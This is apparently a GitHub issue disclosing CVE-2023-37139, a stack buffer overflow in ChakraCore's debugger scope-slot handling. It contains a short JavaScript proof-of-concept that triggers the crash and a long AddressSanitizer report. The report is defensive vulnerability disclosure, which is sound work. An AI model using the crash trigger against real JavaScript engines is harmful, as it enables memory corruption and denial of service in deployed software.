Headline
CVE-2023-37139: dynamic-stack-buffer-overflow in release build · Issue #6884 · chakra-core/ChakraCore
ChakraCore branch master cbb9b was discovered to contain a stack overflow vulnerability via the function Js::ScopeSlots::IsDebuggerScopeSlotArray().
Branch: master
Commit : cbb9b101d18e4c1682ca39a52a201d8e4241ea17
POC :
function Run() {
var intl = new Intl.Collator();
intl.compare('a','b');/**bp:resume('step_into');locals()**/
let C1 = class NotC1 {
attemptOuterBindingChange() { C1 = 1; }
attemptInnerBindingChange() { NotC1 = 1; }
outerbindingUnmodified() { return C1 !== 1; }
innerbindingUnmodified() { return NotC1 !== 1; }
}.Echo('PASS');
}
WScript.Attach(Run);
In release build, ./build.sh --sanitize=address --static -j
I get the following log:
==10284==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffcceecb558 at pc 0x55bf9a7362b3 bp 0x7ffcceec3300 sp 0x7ffcceec32f8
READ of size 8 at 0x7ffcceecb558 thread T0
#0 0x55bf9a7362b2 in Js::ScopeSlots::IsDebuggerScopeSlotArray() (/root/ChakraCore-latest/out/Release/ch+0x6d42b2)
#1 0x55bf9a918523 in Js::SlotArrayVariablesWalker::PopulateMembers() (/root/ChakraCore-latest/out/Release/ch+0x8b6523)
#2 0x55bf9a916f14 in Js::VariableWalkerBase::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8b4f14)
#3 0x55bf9a91ed1a in Js::DiagScopeVariablesWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8bcd1a)
#4 0x55bf9a924b4c in Js::LocalsWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8c2b4c)
#5 0x55bf9a55b7ca in JsrtDebuggerStackFrame::GetLocalsObject(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4f97ca)
#6 0x55bf9a5ed7f5 in JsDiagGetStackProperties (/root/ChakraCore-latest/out/Release/ch+0x58b7f5)
#7 0x55bf9a41c96b in Debugger::GetStackProperties(void*, bool, void**, unsigned short, void*) (/root/ChakraCore-latest/out/Release/ch+0x3ba96b)
#8 0x55bf9b012f61 in Js::JavascriptExternalFunction::StdCallExternalFunctionThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb0f61)
#9 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#10 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#11 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#12 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#13 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#14 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#15 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#16 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#17 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#18 0x55bf9adbdde1 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5bde1)
#19 0x55bf9ab602d9 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafe2d9)
#20 0x55bf9aab41dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
#21 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#22 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#23 0x7f43138e1f41 (<unknown module>)
#24 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#25 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#26 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#27 0x55bf9adbb9c5 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd599c5)
#28 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
#29 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#30 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#31 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#32 0x7f43138e1eb9 (<unknown module>)
#33 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#34 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#35 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#36 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#37 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#38 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#39 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#40 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#41 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#42 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
#43 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#44 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#45 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#46 0x7f43138e1ef1 (<unknown module>)
#47 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#48 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#49 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#50 0x55bf9adbbb55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
#51 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
#52 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#53 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#54 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#55 0x7f43138e1f01 (<unknown module>)
#56 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#57 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#58 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#59 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#60 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#61 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#62 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#63 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#64 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#65 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
#66 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#67 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#68 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#69 0x7f43138e1f09 (<unknown module>)
#70 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#71 0x55bf9a78331a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
#72 0x55bf9a78136d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
#73 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#74 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
#75 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
#76 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
#77 0x55bf9a41ec15 in Debugger::CallFunction(char const*, void**, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3bcc15)
#78 0x55bf9a41b319 in Debugger::HandleDebugEvent(_JsDiagDebugEvent, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b9319)
#79 0x55bf9a550d20 in JsrtDebugManager::CallDebugEventCallback(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0x4eed20)
#80 0x55bf9a551f0a in JsrtDebugManager::CallDebugEventCallbackForBreak(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4eff0a)
#81 0x55bf9a54f7c3 in JsrtDebugManager::ReportBreak(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed7c3)
#82 0x55bf9a54f2a5 in JsrtDebugManager::DispatchHalt(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed2a5)
#83 0x55bf9a95adc9 in Js::ProbeContainer::DispatchStepHandler(Js::InterpreterHaltState*, Js::OpCode*) (/root/ChakraCore-latest/out/Release/ch+0x8f8dc9)
#84 0x55bf9aacd2a0 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6b2a0)
#85 0x55bf9aab3b77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
#86 0x55bf9aab2981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
#87 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#88 0x7f43138e0f99 (<unknown module>)
#89 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#90 0x55bf9a78165a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
#91 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#92 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
#93 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
#94 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
#95 0x55bf9a439b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
#96 0x55bf9a43ce0b in CustomMessage<WScriptJsrt::AttachCallback(void*, bool, void**, unsigned short, void*)::$_1, WScriptJsrt::CallbackMessage>::Call(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3dae0b)
#97 0x55bf9a416804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
#98 0x55bf9a419913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
#99 0x55bf9a41a606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
#100 0x7f4317ecfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#101 0x55bf9a318d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)
Address 0x7ffcceecb558 is located in stack of thread T0 at offset 2968 in frame
#0 0x55bf9aacc8bf in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6a8bf)
This frame has 22 object(s):
[32, 40) 'thisVar.i'
[64, 70) 'ldElemInfo.i'
[96, 112) 'agg.tmp36.i.i'
[128, 144) 'agg.tmp2.i.i.i.i3477'
[160, 176) 'agg.tmp2.i.i.i.i3459'
[192, 208) 'agg.tmp2.i.i.i.i3436'
[224, 240) 'agg.tmp2.i.i.i.i'
[256, 272) 'agg.tmp2.i.i.i'
[288, 352) 'info.i.i3194'
[384, 448) 'info.i.i3153'
[480, 544) 'info.i.i3117'
[576, 640) 'info.i.i3087'
[672, 736) 'info.i.i'
[768, 776) 'ip.addr.i'
[800, 808) 'ip'
[832, 834) 'op'
[848, 912) 'haltState'
[944, 1008) 'haltState83'
[1040, 1048) 'yieldValue'
[1072, 1080) 'yieldValue1592'
[1104, 1168) 'haltState1625'
[1200, 1264) 'haltState1672' <== Memory access at offset 2968 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow (/root/ChakraCore-latest/out/Release/ch+0x6d42b2) in Js::ScopeSlots::IsDebuggerScopeSlotArray()
Shadow bytes around the buggy address:
0x100019dd1650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1660: ca ca ca ca 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100019dd16a0: 00 00 00 00 00 cb cb cb cb cb cb[cb]f1 f1 f1 f1
0x100019dd16b0: f8 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
0x100019dd16c0: f8 f2 f2 f2 f8 f3 f3 f3 00 00 00 00 00 00 00 00
0x100019dd16d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd16e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100019dd16f0: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==10284==ABORTING